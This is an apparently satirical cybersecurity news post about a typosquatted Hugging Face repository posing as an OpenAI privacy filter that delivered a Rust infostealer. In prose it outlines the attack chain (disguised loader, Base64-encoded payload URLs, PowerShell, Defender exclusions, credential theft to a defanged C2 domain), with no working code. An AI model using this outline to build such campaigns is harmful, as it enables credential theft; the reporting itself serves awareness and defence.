Cybersecurity May 12, 2026 · 3 min read

A Fake OpenAI ‘Privacy Filter’ Hit Number One on Hugging Face With 244,000 Downloads — It Was a Rust-Based Infostealer Wearing a Lab Coat

🤚 The Open-Palm Trending Page

A malicious repository called Open-OSS/privacy-filter spent enough time at the #1 trending spot on Hugging Face to accumulate 244,000 downloads before anyone noticed it was, in fact, not affiliated with OpenAI and was instead delivering a sophisticated Rust-based infostealer to everyone who installed it.

Security researchers at HiddenLayer discovered the campaign on May 7, by which point the repo had already achieved what most legitimate AI researchers spend months trying to accomplish: viral distribution. The attackers used a classic typosquatting technique — naming the project just close enough to OpenAI’s actual work that the average developer’s pattern-matching brain filled in the rest. Because who wouldn’t trust a privacy filter from the company that trained GPT on the entire internet?

The attack chain was a masterclass in layered deception:

  • A malicious loader.py file disguised with legitimate-looking AI code
  • SSL verification disabled (a red flag the size of a billboard, routinely ignored)
  • Base64-encoded URLs fetching JSON payloads containing PowerShell commands
  • A batch file performing privilege escalation and adding the malware to Microsoft Defender’s exclusion list — because the best hiding spot is the one you ask Windows to create for you

👐 The Two-Handed Credential Harvest

The final payload — a Rust-based infostealer — went after everything: browser credentials, Discord tokens, cryptocurrency wallets, SSH keys, FTP credentials, VPN configurations, and system information. All of it was exfiltrated to a command-and-control server at recargapopular[.]com, a domain name that sounds less like a cybercrime operation and more like a Latin American phone top-up service.

The malware also included anti-analysis features that checked for virtual machines, sandboxes, debuggers, and analysis tools — the digital equivalent of a burglar who checks for cameras before entering but somehow forgot that 244,000 people watched him walk in through the front door.

HiddenLayer linked the infrastructure to other malicious repositories and an npm typosquatting campaign distributing the WinOS 4.0 implant, suggesting this wasn’t an isolated incident but rather one node in a broader supply chain compromise operation. Users who installed the package were advised to reimage their entire systems and rotate all credentials — the cybersecurity equivalent of “burn the house down and start over.”

🌿 The Gentle Awakening

There is something philosophically perfect about a fake privacy filter being the vehicle for stealing all your private data. It’s the kind of irony that would make Alanis Morissette finally have an actual example of irony.

Hugging Face has become the npm of machine learning — an open platform where anyone can upload anything, wrapped in the implicit trust that comes from community curation. But “community curation” in practice means “the trending algorithm decided this was popular, and popularity equals legitimacy.” The same discovery mechanism that helps researchers find genuine breakthroughs also laundered a credential-stealing operation to a quarter-million installations.

The download count itself may have been artificially inflated, which raises an even more unsettling question: the attackers understood that perceived popularity is a security vulnerability. They didn’t need to hack Hugging Face. They just needed to hack the concept of social proof.

👑 The Gold-Leaf Platform Reckoning

This incident arrives at a moment when every major AI platform is racing to become the default repository for models, datasets, and tools. Hugging Face, GitHub, npm, PyPI — they’re all competing for the same prize: being the place developers go first. And the place developers go first is, by definition, the place attackers go first.

The AI supply chain is now a supply chain in the traditional software security sense, complete with all the trust assumptions, dependency confusion, and typosquatting vulnerabilities that have plagued package managers for a decade. The only difference is that AI repositories carry an additional layer of implicit authority — if something is trending on Hugging Face, it must be good, because AI is complicated and surely someone would have noticed if it were malicious.

Nobody noticed. For 244,000 downloads, nobody noticed.

“The model performed exceptionally well on all benchmarks, especially the ones measuring how quickly it could exfiltrate your SSH keys to a domain registered three days ago.” — The Slap of Wisdom Threat Intelligence Desk, currently rotating credentials for the fourth time this quarter